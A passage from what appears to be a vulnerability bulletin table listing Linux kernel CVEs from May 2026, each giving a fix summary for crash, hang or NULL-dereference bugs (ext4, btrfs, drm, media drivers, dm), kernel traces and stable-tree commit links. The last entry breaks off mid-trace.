| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: move ext4_percpu_param_init() before ext4_mb_init() When running `kvm-xfstests -c ext4/1k -C 1 generic/383` with the `DOUBLE_CHECK` macro defined, the following panic is triggered: ================================================================== EXT4-fs error (device vdc): ext4_validate_block_bitmap:423: comm mount: bg 0: bad block bitmap checksum BUG: unable to handle page fault for address: ff110000fa2cc000 PGD 3e01067 P4D 3e02067 PUD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 0 UID: 0 PID: 2386 Comm: mount Tainted: G W 6.18.0-gba65a4e7120a-dirty #1152 PREEMPT(none) RIP: 0010:percpu_counter_add_batch+0x13/0xa0 Call Trace: <TASK> ext4_mark_group_bitmap_corrupted+0xcb/0xe0 ext4_validate_block_bitmap+0x2a1/0x2f0 ext4_read_block_bitmap+0x33/0x50 mb_group_bb_bitmap_alloc+0x33/0x80 ext4_mb_add_groupinfo+0x190/0x250 ext4_mb_init_backend+0x87/0x290 ext4_mb_init+0x456/0x640 __ext4_fill_super+0x1072/0x1680 ext4_fill_super+0xd3/0x280 get_tree_bdev_flags+0x132/0x1d0 vfs_get_tree+0x29/0xd0 vfs_cmd_create+0x59/0xe0 __do_sys_fsconfig+0x4f6/0x6b0 do_syscall_64+0x50/0x1f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e ================================================================== This issue can be reproduced using the following commands: mkfs.ext4 -F -q -b 1024 /dev/sda 5G tune2fs -O quota,project /dev/sda mount /dev/sda /tmp/test With DOUBLE_CHECK defined, mb_group_bb_bitmap_alloc() reads and validates the block bitmap. When the validation fails, ext4_mark_group_bitmap_corrupted() attempts to update sbi->s_freeclusters_counter. However, this percpu_counter has not been initialized yet at this point, which leads to the panic described above. Fix this by moving the execution of ext4_percpu_param_init() to occur before ext4_mb_init(), ensuring the per-CPU counters are initialized before they are used. | 2026-05-08 | not yet calculated | CVE-2026-43288 | https://git.kernel.org/stable/c/0d5fcb063cdabb9aeaa8554b7fedad2092c4150e https://git.kernel.org/stable/c/9e9fb259bcddf459a0168f4a964e979e500a68a5 https://git.kernel.org/stable/c/bf5b609524497c195f801cd5707252384aed8149 https://git.kernel.org/stable/c/aec095f3cc6cf209effd93278ce35be27db81d73 https://git.kernel.org/stable/c/270564513489d98b721a1e4a10017978d5213bff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kexec: derive purgatory entry from symbol kexec_load_purgatory() derives image->start by locating e_entry inside an SHF_EXECINSTR section. If the purgatory object contains multiple executable sections with overlapping sh_addr, the entrypoint check can match more than once and trigger a WARN. Derive the entry section from the purgatory_start symbol when present and compute image->start from its final placement. Keep the existing e_entry fallback for purgatories that do not expose the symbol. WARNING: kernel/kexec_file.c:1009 at kexec_load_purgatory+0x395/0x3c0, CPU#10: kexec/1784 Call Trace: <TASK> bzImage64_load+0x133/0xa00 __do_sys_kexec_file_load+0x2b3/0x5c0 do_syscall_64+0x81/0x610 entry_SYSCALL_64_after_hwframe+0x76/0x7e [me@linux.beauty: move helper to avoid forward declaration, per Baoquan] | 2026-05-08 | not yet calculated | CVE-2026-43289 | https://git.kernel.org/stable/c/027797595a108726f4a0a45d225f603b0ffbd22b https://git.kernel.org/stable/c/1737d37ae1d2814e6cf0a1af87af3d41f0812b95 https://git.kernel.org/stable/c/f736032c638a33a243e9126e617788f763d648f9 https://git.kernel.org/stable/c/cfccd3b8c51bc57a8a6fcb2fd30453afae5bc0d2 https://git.kernel.org/stable/c/875355152b33436907c2a6d2ffad1431fa86c62b https://git.kernel.org/stable/c/36eb314184a0ae74dd42914b47d2b9fc43be8034 https://git.kernel.org/stable/c/5226570bd252cea2e805a161cb0f75c204c3108a https://git.kernel.org/stable/c/480e1d5c64bb14441f79f2eb9421d5e26f91ea3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/vmalloc: prevent RCU stalls in kasan_release_vmalloc_node When CONFIG_PAGE_OWNER is enabled, freeing KASAN shadow pages during vmalloc cleanup triggers expensive stack unwinding that acquires RCU read locks. Processing a large purge_list without rescheduling can cause the task to hold CPU for extended periods (10+ seconds), leading to RCU stalls and potential OOM conditions. The issue manifests in purge_vmap_node() -> kasan_release_vmalloc_node() where iterating through hundreds or thousands of vmap_area entries and freeing their associated shadow pages causes: rcu: INFO: rcu_preempt detected stalls on CPUs/tasks: rcu: Tasks blocked on level-0 rcu_node (CPUs 0-1): P6229/1:b..l ... task:kworker/0:17 state:R running task stack:28840 pid:6229 ... kasan_release_vmalloc_node+0x1ba/0xad0 mm/vmalloc.c:2299 purge_vmap_node+0x1ba/0xad0 mm/vmalloc.c:2299 Each call to kasan_release_vmalloc() can free many pages, and with page_owner tracking, each free triggers save_stack() which performs stack unwinding under RCU read lock. Without yielding, this creates an unbounded RCU critical section. Add periodic cond_resched() calls within the loop to allow: - RCU grace periods to complete - Other tasks to run - Scheduler to preempt when needed The fix uses need_resched() for immediate response under load, with a batch count of 32 as a guaranteed upper bound to prevent worst-case stalls even under light load. | 2026-05-08 | not yet calculated | CVE-2026-43292 | https://git.kernel.org/stable/c/2efa9c02c9b4c0d6866aa445f11056809b25ca28 https://git.kernel.org/stable/c/1afe45f89d54b7183768ebbbbf14238ec187ab5c https://git.kernel.org/stable/c/b351fbe71091f7c8676c8ba597653d08b6719447 https://git.kernel.org/stable/c/5747435e0fd474c24530ef1a6822f47e7d264b27 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix kthread worker destruction in polling mode Fix the cleanup order in polling mode (irq < 0) to prevent kernel warnings during module removal. Cancel the hrtimer before destroying the kthread worker to ensure work queues are empty. In polling mode, the driver uses hrtimer to periodically trigger wave5_vpu_timer_callback() which queues work via kthread_queue_work(). The kthread_destroy_worker() function validates that both work queues are empty with WARN_ON(!list_empty(&worker->work_list)) and WARN_ON(!list_empty(&worker->delayed_work_list)). The original code called kthread_destroy_worker() before hrtimer_cancel(), creating a race condition where the timer could fire during worker destruction and queue new work, triggering the WARN_ON. This causes the following warning on every module unload in polling mode: ------------[ cut here ]------------ WARNING: CPU: 2 PID: 1034 at kernel/kthread.c:1430 kthread_destroy_worker+0x84/0x98 Modules linked in: wave5(-) rpmsg_ctrl rpmsg_char ... Call trace: kthread_destroy_worker+0x84/0x98 wave5_vpu_remove+0xc8/0xe0 [wave5] platform_remove+0x30/0x58 ... ---[ end trace 0000000000000000 ]--- | 2026-05-08 | not yet calculated | CVE-2026-43293 | https://git.kernel.org/stable/c/156020e889edf4593870d926d3c4a6d06baac44a https://git.kernel.org/stable/c/cc8071b1bac6568ea09d54be2d4f74dba80e17f8 https://git.kernel.org/stable/c/0c2e752688a0ee3b89993e6de6c496d863870c93 https://git.kernel.org/stable/c/5a0c122e834b2f7f029526422c71be922960bf03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some panels Since commit 56de5e305d4b ("clk: renesas: r9a07g044: Add MSTOP for RZ/G2L") we may get the following kernel panic, for some panels, when rebooting: systemd-shutdown[1]: Rebooting. Call trace: ... do_serror+0x28/0x68 el1h_64_error_handler+0x34/0x50 el1h_64_error+0x6c/0x70 rzg2l_mipi_dsi_host_transfer+0x114/0x458 (P) mipi_dsi_device_transfer+0x44/0x58 mipi_dsi_dcs_set_display_off_multi+0x9c/0xc4 ili9881c_unprepare+0x38/0x88 drm_panel_unprepare+0xbc/0x108 This happens for panels that need to send MIPI-DSI commands in their unprepare() callback. Since the MIPI-DSI interface is stopped at that point, rzg2l_mipi_dsi_host_transfer() triggers the kernel panic. Fix by moving rzg2l_mipi_dsi_stop() to new callback function rzg2l_mipi_dsi_atomic_post_disable(). With this change we now have the correct power-down/stop sequence: systemd-shutdown[1]: Rebooting. rzg2l-mipi-dsi 10850000.dsi: rzg2l_mipi_dsi_atomic_disable(): entry ili9881c-dsi 10850000.dsi.0: ili9881c_unprepare(): entry rzg2l-mipi-dsi 10850000.dsi: rzg2l_mipi_dsi_atomic_post_disable(): entry reboot: Restarting system | 2026-05-08 | not yet calculated | CVE-2026-43294 | https://git.kernel.org/stable/c/79f42487ed60d0d5ffce97c3bb98f80c3d17735a https://git.kernel.org/stable/c/41cda667ffc5074c56279c632b0c20024da6ecdd https://git.kernel.org/stable/c/64aa8b3a60a825134f7d866adf05c024bbe0c24c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rapidio: replace rio_free_net() with kfree() in rio_scan_alloc_net() When idtab allocation fails, net is not registered with rio_add_net() yet, so kfree(net) is sufficient to release the memory. Set mport->net to NULL to avoid dangling pointer. | 2026-05-08 | not yet calculated | CVE-2026-43295 | https://git.kernel.org/stable/c/83e579c2f7f6b1706323d744833b26470049dcc2 https://git.kernel.org/stable/c/34a4f233df5eef5f1f113b2196142c0568b387f8 https://git.kernel.org/stable/c/fecf292c6691970897396190855aa38826b7104e https://git.kernel.org/stable/c/649c2e853608cad0b0cba545555d168e67f094b3 https://git.kernel.org/stable/c/87272e3e70ec4b666885bd520ff77463c11444ef https://git.kernel.org/stable/c/e5a732bfe29451e16abf9c6f07ce5948b22f3d59 https://git.kernel.org/stable/c/78812c4fb7ed242d5961bf1337a49070d6487c94 https://git.kernel.org/stable/c/666183dcdd9ad3b8156a1df7f204f728f720380f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rockchip: rga: Fix possible ERR_PTR dereference in rga_buf_init() rga_get_frame() can return ERR_PTR(-EINVAL) when buffer type is unsupported or invalid. rga_buf_init() does not check the return value and unconditionally dereferences the pointer when accessing f->size. Add proper ERR_PTR checking and return the error to prevent dereferencing an invalid pointer. | 2026-05-08 | not yet calculated | CVE-2026-43297 | https://git.kernel.org/stable/c/5da29ade540b51763b950987bd410add7edaf3d1 https://git.kernel.org/stable/c/1af2853b4e97fd95262fdef311b2334337069bc9 https://git.kernel.org/stable/c/aa22221c5dc695a3d479e1e1b63f0c0e9eb29dbf https://git.kernel.org/stable/c/81f8e0e6a2e115df9274d0289779f8fca694479c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Skip vcn poison irq release on VF VF doesn't enable VCN poison irq in VCNv2.5. Skip releasing it and avoid call trace during deinitialization. [ 71.913601] [drm] clean up the vf2pf work item [ 71.915088] ------------[ cut here ]------------ [ 71.915092] WARNING: CPU: 3 PID: 1079 at /tmp/amd.aFkFvSQl/amd/amdgpu/amdgpu_irq.c:641 amdgpu_irq_put+0xc6/0xe0 [amdgpu] [ 71.915355] Modules linked in: amdgpu(OE-) amddrm_ttm_helper(OE) amdttm(OE) amddrm_buddy(OE) amdxcp(OE) amddrm_exec(OE) amd_sched(OE) amdkcl(OE) drm_suballoc_helper drm_display_helper cec rc_core i2c_algo_bit video wmi binfmt_misc nls_iso8859_1 intel_rapl_msr intel_rapl_common input_leds joydev serio_raw mac_hid qemu_fw_cfg sch_fq_codel dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua efi_pstore ip_tables x_tables autofs4 btrfs blake2b_generic raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 hid_generic crct10dif_pclmul crc32_pclmul polyval_clmulni polyval_generic ghash_clmulni_intel usbhid 8139too sha256_ssse3 sha1_ssse3 hid psmouse bochs i2c_i801 ahci drm_vram_helper libahci i2c_smbus lpc_ich drm_ttm_helper 8139cp mii ttm aesni_intel crypto_simd cryptd [ 71.915484] CPU: 3 PID: 1079 Comm: rmmod Tainted: G OE 6.8.0-87-generic #88~22.04.1-Ubuntu [ 71.915489] Hardware name: Red Hat KVM/RHEL, BIOS 1.16.3-2.el9_5.1 04/01/2014 [ 71.915492] RIP: 0010:amdgpu_irq_put+0xc6/0xe0 [amdgpu] [ 71.915768] Code: 75 84 b8 ea ff ff ff eb d4 44 89 ea 48 89 de 4c 89 e7 e8 fd fc ff ff 5b 41 5c 41 5d 41 5e 5d 31 d2 31 f6 31 ff e9 55 30 3b c7 <0f> 0b eb d4 b8 fe ff ff ff eb a8 e9 b7 3b 8a 00 66 2e 0f 1f 84 00 [ 71.915771] RSP: 0018:ffffcf0800eafa30 EFLAGS: 00010246 [ 71.915775] RAX: 0000000000000000 RBX: ffff891bda4b0668 RCX: 0000000000000000 [ 71.915777] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 71.915779] RBP: ffffcf0800eafa50 R08: 0000000000000000 R09: 0000000000000000 [ 71.915781] R10: 0000000000000000 R11: 0000000000000000 R12: ffff891bda480000 [ 71.915782] R13: 0000000000000000 R14: 0000000000000001 R15: 0000000000000000 [ 71.915792] FS: 000070cff87c4c40(0000) GS:ffff893abfb80000(0000) knlGS:0000000000000000 [ 71.915795] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 71.915797] CR2: 00005fa13073e478 CR3: 000000010d634006 CR4: 0000000000770ef0 [ 71.915800] PKRU: 55555554 [ 71.915802] Call Trace: [ 71.915805] <TASK> [ 71.915809] vcn_v2_5_hw_fini+0x19e/0x1e0 [amdgpu] | 2026-05-08 | not yet calculated | CVE-2026-43298 | https://git.kernel.org/stable/c/8ee9aa80d4f1893a6699d46c403a1731548b544b https://git.kernel.org/stable/c/f1db6fc5a834c8ca9485cc0596dd7df8b8619b64 https://git.kernel.org/stable/c/8980be03b3f9a4b58197ef95d3b37efa41a25331 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: do not ASSERT() when the fs flips RO inside btrfs_repair_io_failure() [BUG] There is a bug report that when btrfs hits ENOSPC error in a critical path, btrfs flips RO (this part is expected, although the ENOSPC bug still needs to be addressed). The problem is after the RO flip, if there is a read repair pending, we can hit the ASSERT() inside btrfs_repair_io_failure() like the following: BTRFS info (device vdc): relocating block group 30408704 flags metadata|raid1 ------------[ cut here ]------------ BTRFS: Transaction aborted (error -28) WARNING: fs/btrfs/extent-tree.c:3235 at __btrfs_free_extent.isra.0+0x453/0xfd0, CPU#1: btrfs/383844 Modules linked in: kvm_intel kvm irqbypass [...] ---[ end trace 0000000000000000 ]--- BTRFS info (device vdc state EA): 2 enospc errors during balance BTRFS info (device vdc state EA): balance: ended with status: -30 BTRFS error (device vdc state EA): parent transid verify failed on logical 30556160 mirror 2 wanted 8 found 6 BTRFS error (device vdc state EA): bdev /dev/nvme0n1 errs: wr 0, rd 0, flush 0, corrupt 10, gen 0 [...] assertion failed: !(fs_info->sb->s_flags & SB_RDONLY) :: 0, in fs/btrfs/bio.c:938 ------------[ cut here ]------------ assertion failed: !(fs_info->sb->s_flags & SB_RDONLY) :: 0, in fs/btrfs/bio.c:938 kernel BUG at fs/btrfs/bio.c:938! Oops: invalid opcode: 0000 [#1] SMP NOPTI CPU: 0 UID: 0 PID: 868 Comm: kworker/u8:13 Tainted: G W N 6.19.0-rc6+ #4788 PREEMPT(full) Tainted: [W]=WARN, [N]=TEST Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 Workqueue: btrfs-endio simple_end_io_work RIP: 0010:btrfs_repair_io_failure.cold+0xb2/0x120 RSP: 0000:ffffc90001d2bcf0 EFLAGS: 00010246 RAX: 0000000000000051 RBX: 0000000000001000 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff8305cf42 RDI: 00000000ffffffff RBP: 0000000000000002 R08: 00000000fffeffff R09: ffffffff837fa988 R10: ffffffff8327a9e0 R11: 6f69747265737361 R12: ffff88813018d310 R13: ffff888168b8a000 R14: ffffc90001d2bd90 R15: ffff88810a169000 FS: 0000000000000000(0000) GS:ffff8885e752c000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 ------------[ cut here ]------------ [CAUSE] The cause of -ENOSPC error during the test case btrfs/124 is still unknown, although it's known that we still have cases where metadata can be over-committed but can not be fulfilled correctly, thus if we hit such ENOSPC error inside a critical path, we have no choice but abort the current transaction. This will mark the fs read-only. The problem is inside the btrfs_repair_io_failure() path that we require the fs not to be mount read-only. This is normally fine, but if we are doing a read-repair meanwhile the fs flips RO due to a critical error, we can enter btrfs_repair_io_failure() with super block set to read-only, thus triggering the above crash. [FIX] Just replace the ASSERT() with a proper return if the fs is already read-only. | 2026-05-08 | not yet calculated | CVE-2026-43299 | https://git.kernel.org/stable/c/f6df18c001e3dcebc08482d0adeacd0cfea08593 https://git.kernel.org/stable/c/8ceaad6cd6e7fa5f73b0b2796a2e85d75d37e9f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panel: Fix a possible null-pointer dereference in jdi_panel_dsi_remove() In jdi_panel_dsi_remove(), jdi is explicitly checked, indicating that it may be NULL: if (!jdi) mipi_dsi_detach(dsi); However, when jdi is NULL, the function does not return and continues by calling jdi_panel_disable(): err = jdi_panel_disable(&jdi->base); Inside jdi_panel_disable(), jdi is dereferenced unconditionally, which can lead to a NULL-pointer dereference: struct jdi_panel *jdi = to_panel_jdi(panel); backlight_disable(jdi->backlight); To prevent such a potential NULL-pointer dereference, return early from jdi_panel_dsi_remove() when jdi is NULL. | 2026-05-08 | not yet calculated | CVE-2026-43300 | https://git.kernel.org/stable/c/ec2f37bbb733cdd7ed7d04171fca728a532414d5 https://git.kernel.org/stable/c/2f5427d8726b22b807beec248d7d6bf88e291e0b https://git.kernel.org/stable/c/83ce0085fabf757b039322928188ad78e962d609 https://git.kernel.org/stable/c/95eed73b871111123a8b1d31cb1fce7e902e49ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix PM runtime usage count underflow Replace pm_runtime_put_sync() with pm_runtime_dont_use_autosuspend() in the remove path to properly pair with pm_runtime_use_autosuspend() from probe. This allows pm_runtime_disable() to handle reference count cleanup correctly regardless of current suspend state. The driver calls pm_runtime_put_sync() unconditionally in remove, but the device may already be suspended due to autosuspend configured in probe. When autosuspend has already suspended the device, the usage count is 0, and pm_runtime_put_sync() decrements it to -1. This causes the following warning on module unload: ------------[ cut here ]------------ WARNING: CPU: 1 PID: 963 at kernel/kthread.c:1430 kthread_destroy_worker+0x84/0x98 ... vdec 30210000.video-codec: Runtime PM usage count underflow! | 2026-05-08 | not yet calculated | CVE-2026-43301 | https://git.kernel.org/stable/c/3a278a55ead50db2444c8f01410c7f5a68723990 https://git.kernel.org/stable/c/0bffda02317989f8d5cdc2d4462a4110b1290cf0 https://git.kernel.org/stable/c/9cf4452e824c1e2d41c9c0b13cc8a32a0a7dec38 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Set DMA segment size to avoid debug warnings When using V3D rendering with CONFIG_DMA_API_DEBUG enabled, the kernel occasionally reports a segment size mismatch. This is because 'max_seg_size' is not set. The kernel defaults to 64K. setting 'max_seg_size' to the maximum will prevent 'debug_dma_map_sg()' from complaining about the over-mapping of the V3D segment length. DMA-API: v3d 1002000000.v3d: mapping sg segment longer than device claims to support [len=8290304] [max=65536] WARNING: CPU: 0 PID: 493 at kernel/dma/debug.c:1179 debug_dma_map_sg+0x330/0x388 CPU: 0 UID: 0 PID: 493 Comm: Xorg Not tainted 6.12.53-yocto-standard #1 Hardware name: Raspberry Pi 5 Model B Rev 1.0 (DT) pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : debug_dma_map_sg+0x330/0x388 lr : debug_dma_map_sg+0x330/0x388 sp : ffff8000829a3ac0 x29: ffff8000829a3ac0 x28: 0000000000000001 x27: ffff8000813fe000 x26: ffffc1ffc0000000 x25: ffff00010fdeb760 x24: 0000000000000000 x23: ffff8000816a9bf0 x22: 0000000000000001 x21: 0000000000000002 x20: 0000000000000002 x19: ffff00010185e810 x18: ffffffffffffffff x17: 69766564206e6168 x16: 74207265676e6f6c x15: 20746e656d676573 x14: 20677320676e6970 x13: 5d34303334393134 x12: 0000000000000000 x11: 00000000000000c0 x10: 00000000000009c0 x9 : ffff8000800e0b7c x8 : ffff00010a315ca0 x7 : ffff8000816a5110 x6 : 0000000000000001 x5 : 000000000000002b x4 : 0000000000000002 x3 : 0000000000000008 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00010a315280 Call trace: debug_dma_map_sg+0x330/0x388 __dma_map_sg_attrs+0xc0/0x278 dma_map_sgtable+0x30/0x58 drm_gem_shmem_get_pages_sgt+0xb4/0x140 v3d_bo_create_finish+0x28/0x130 [v3d] v3d_create_bo_ioctl+0x54/0x180 [v3d] drm_ioctl_kernel+0xc8/0x140 drm_ioctl+0x2d4/0x4d8 | 2026-05-08 | not yet calculated | CVE-2026-43302 | https://git.kernel.org/stable/c/14d0d6c8b4504a60cfeea74775ab2e0164019e65 https://git.kernel.org/stable/c/225023e3619b81af6d8d0e680503fc2d68633023 https://git.kernel.org/stable/c/2663ef70c6123b2232190f917275e5c3175f97d0 https://git.kernel.org/stable/c/cf510785f74e74c54de40a43a955b7f844857487 https://git.kernel.org/stable/c/0290934d30abe7c88e18140fd5184c3f386b1e44 https://git.kernel.org/stable/c/db15f469a88d3bbeeaa9f8c9f5e74d856ba5d7d2 https://git.kernel.org/stable/c/9eb018828b1b30dfba689c060735c50fc5b9f704 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix mismatched unlock for DMUB HW lock in HWSS fast path [Why] The evaluation for whether we need to use the DMUB HW lock isn't the same as whether we need to unlock which results in a hang when the fast path is used for ASIC without FAMS support. [How] Store a flag that indicates whether we should use the lock and use that same flag to specify whether unlocking is needed. | 2026-05-08 | not yet calculated | CVE-2026-43305 | https://git.kernel.org/stable/c/4e387ad67efb100b645630ffbce7716786f52283 https://git.kernel.org/stable/c/af3303970da5ce5bfe6dffdd07f38f42aad603e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: crypto: Use the correct destructor kfunc type With CONFIG_CFI enabled, the kernel strictly enforces that indirect function calls use a function pointer type that matches the target function. I ran into the following type mismatch when running BPF self-tests: CFI failure at bpf_obj_free_fields+0x190/0x238 (target: bpf_crypto_ctx_release+0x0/0x94; expected type: 0xa488ebfc) Internal error: Oops - CFI: 00000000f2008228 [#1] SMP ... As bpf_crypto_ctx_release() is also used in BPF programs and using a void pointer as the argument would make the verifier unhappy, add a simple stub function with the correct type and register it as the destructor kfunc instead. | 2026-05-08 | not yet calculated | CVE-2026-43306 | https://git.kernel.org/stable/c/4e3e57dbf46dad3498f8c4219ce2dba756875962 https://git.kernel.org/stable/c/50d6fd69388cc7b05dce72f09080674dcede4ac9 https://git.kernel.org/stable/c/3979a550fe06b370d73647f59cf462fa525c9ec4 https://git.kernel.org/stable/c/b40a5d724f29fc2eed23ff353808a9aae616b48a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: don't BUG() on unexpected delayed ref type in run_one_delayed_ref() There is no need to BUG(), we can just return an error and log an error message. | 2026-05-08 | not yet calculated | CVE-2026-43308 | https://git.kernel.org/stable/c/5549743e11c06da23cfa7712a994b9f1e69064c6 https://git.kernel.org/stable/c/c7d1d4ff56744074e005771aff193b927392d51f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md raid: fix hang when stopping arrays with metadata through dm-raid When using device-mapper's dm-raid target, stopping a RAID array can cause the system to hang under specific conditions. This occurs when: - A dm-raid managed device tree is suspended from top to bottom (the top-level RAID device is suspended first, followed by its underlying metadata and data devices) - The top-level RAID device is then removed Removing the top-level device triggers a hang in the following sequence: the dm-raid destructor calls md_stop(), which tries to flush the write-intent bitmap by writing to the metadata sub-devices. However, these devices are already suspended, making them unable to complete the write-intent operations and causing an indefinite block. Fix: - Prevent bitmap flushing when md_stop() is called from dm-raid destructor context and avoid a quiescing/unquescing cycle which could also cause I/O - Still allow write-intent bitmap flushing when called from dm-raid suspend context This ensures that RAID array teardown can complete successfully even when the underlying devices are in a suspended state. This second patch uses md_is_rdwr() to distinguish between suspend and destructor paths as elaborated on above. | 2026-05-08 | not yet calculated | CVE-2026-43309 | https://git.kernel.org/stable/c/24783dd06de870d646c25207bae186f78195f912 https://git.kernel.org/stable/c/338378dfffbdbb8d37a18f0a0c0358812671f91e https://git.kernel.org/stable/c/cefcb9297fbdb6d94b61787b4f8d84f55b741470 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: verisilicon: Avoid G2 bus error while decoding H.264 and HEVC For the i.MX8MQ platform, there is a hardware limitation: the g1 VPU and g2 VPU cannot decode simultaneously; otherwise, it will cause below bus error and produce corrupted pictures, even potentially lead to system hang. [ 110.527986] hantro-vpu 38310000.video-codec: frame decode timed out. [ 110.583517] hantro-vpu 38310000.video-codec: bus error detected. Therefore, it is necessary to ensure that g1 and g2 operate alternately. This allows for successful multi-instance decoding of H.264 and HEVC. To achieve this, g1 and g2 share the same v4l2_m2m_dev, and then the v4l2_m2m_dev can handle the scheduling. | 2026-05-08 | not yet calculated | CVE-2026-43310 | https://git.kernel.org/stable/c/286d629d10640bc22f3bf46aa4f356eb7975e862 https://git.kernel.org/stable/c/e0203ddf9af7c8e170e1e99ce83b4dc07f0cd765 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc/tegra: pmc: Fix unsafe generic_handle_irq() call Currently, when resuming from system suspend on Tegra platforms, the following warning is observed: WARNING: CPU: 0 PID: 14459 at kernel/irq/irqdesc.c:666 Call trace: handle_irq_desc+0x20/0x58 (P) tegra186_pmc_wake_syscore_resume+0xe4/0x15c syscore_resume+0x3c/0xb8 suspend_devices_and_enter+0x510/0x540 pm_suspend+0x16c/0x1d8 The warning occurs because generic_handle_irq() is being called from a non-interrupt context which is considered as unsafe. Fix this warning by deferring generic_handle_irq() call to an IRQ work which gets executed in hard IRQ context where generic_handle_irq() can be called safely. When PREEMPT_RT kernels are used, regular IRQ work (initialized with init_irq_work) is deferred to run in per-CPU kthreads in preemptible context rather than hard IRQ context. Hence, use the IRQ_WORK_INIT_HARD variant so that with PREEMPT_RT kernels, the IRQ work is processed in hardirq context instead of being deferred to a thread which is required for calling generic_handle_irq(). On non-PREEMPT_RT kernels, both init_irq_work() and IRQ_WORK_INIT_HARD() execute in IRQ context, so this change has no functional impact for standard kernel configurations. [treding@nvidia.com: miscellaneous cleanups] | 2026-05-08 | not yet calculated | CVE-2026-43311 | https://git.kernel.org/stable/c/64016227dcdb968b7030eda04304f3d0df5d209d https://git.kernel.org/stable/c/e6d96073af681780820c94079b978474a8a44413 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c: ov5647: Initialize subdev before controls In ov5647_init_controls() we call v4l2_get_subdevdata, but it is initialized by v4l2_i2c_subdev_init() in the probe, which currently happens after init_controls(). This can result in a segfault if the error condition is hit, and we try to access i2c_client, so fix the order. | 2026-05-08 | not yet calculated | CVE-2026-43312 | https://git.kernel.org/stable/c/f2a1998bc0053ebfe137f65081ed13afd9f34502 https://git.kernel.org/stable/c/59e372aa4cf60e2500eba7f978acdcb18bb49032 https://git.kernel.org/stable/c/cabd025182cfed4a19b3aab57493e312d681e398 https://git.kernel.org/stable/c/2dedda97a64e7735844609c6c77c0dd953d73833 https://git.kernel.org/stable/c/8ecb21c20387cc0c8aa00489a21ccc69f6b0f5d1 https://git.kernel.org/stable/c/fb69e4842f5b463ff5f121d2ac7746014e3477ea https://git.kernel.org/stable/c/eee13cbccacb6d0a3120c126b8544030905b069d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: processor: Fix NULL-pointer dereference in acpi_processor_errata_piix4() In acpi_processor_errata_piix4(), the pointer dev is first assigned an IDE device and then reassigned an ISA device: dev = pci_get_subsys(..., PCI_DEVICE_ID_INTEL_82371AB, ...); dev = pci_get_subsys(..., PCI_DEVICE_ID_INTEL_82371AB_0, ...); If the first lookup succeeds but the second fails, dev becomes NULL. This leads to a potential null-pointer dereference when dev_dbg() is called: if (errata.piix4.bmisx) dev_dbg(&dev->dev, ...); To prevent this, use two temporary pointers and retrieve each device independently, avoiding overwriting dev with a possible NULL value. [ rjw: Subject adjustment, added an empty code line ] | 2026-05-08 | not yet calculated | CVE-2026-43313 | https://git.kernel.org/stable/c/06724a60cfa9767ea90b0f5d3dfb5cdd251b64f5 https://git.kernel.org/stable/c/ad86ac604f8391c0212a91412d4f764c7a85f254 https://git.kernel.org/stable/c/01e8751b37a366b1ca561add0042f2ceb18c03bf https://git.kernel.org/stable/c/b803811485ac0b2f774b6bf3abc8b999ba3b7033 https://git.kernel.org/stable/c/29f60d3d06818d40118a30d663231f027ae87a05 https://git.kernel.org/stable/c/0398b641be2b66c2fc7e0163c606ef19372e7ad5 https://git.kernel.org/stable/c/f132e089fe89cadc2098991f0a3cb05c3f824ac6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: remove fake timeout to avoid leak request Since commit 15f73f5b3e59 ("blk-mq: move failure injection out of blk_mq_complete_request"), drivers are responsible for calling blk_should_fake_timeout() at appropriate code paths and opportunities. However, the dm driver does not implement its own timeout handler and relies on the timeout handling of its slave devices. If an io-timeout-fail error is injected to a dm device, the request will be leaked and never completed, causing tasks to hang indefinitely. Reproduce: 1. prepare dm which has iscsi slave device 2. inject io-timeout-fail to dm echo 1 >/sys/class/block/dm-0/io-timeout-fail echo 100 >/sys/kernel/debug/fail_io_timeout/probability echo 10 >/sys/kernel/debug/fail_io_timeout/times 3. read/write dm 4. iscsiadm -m node -u Result: hang task like below [ 862.243768] INFO: task kworker/u514:2:151 blocked for more than 122 seconds. [ 862.244133] Tainted: G E 6.19.0-rc1+ #51 [ 862.244337] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 862.244718] task:kworker/u514:2 state:D stack:0 pid:151 tgid:151 ppid:2 task_flags:0x4288060 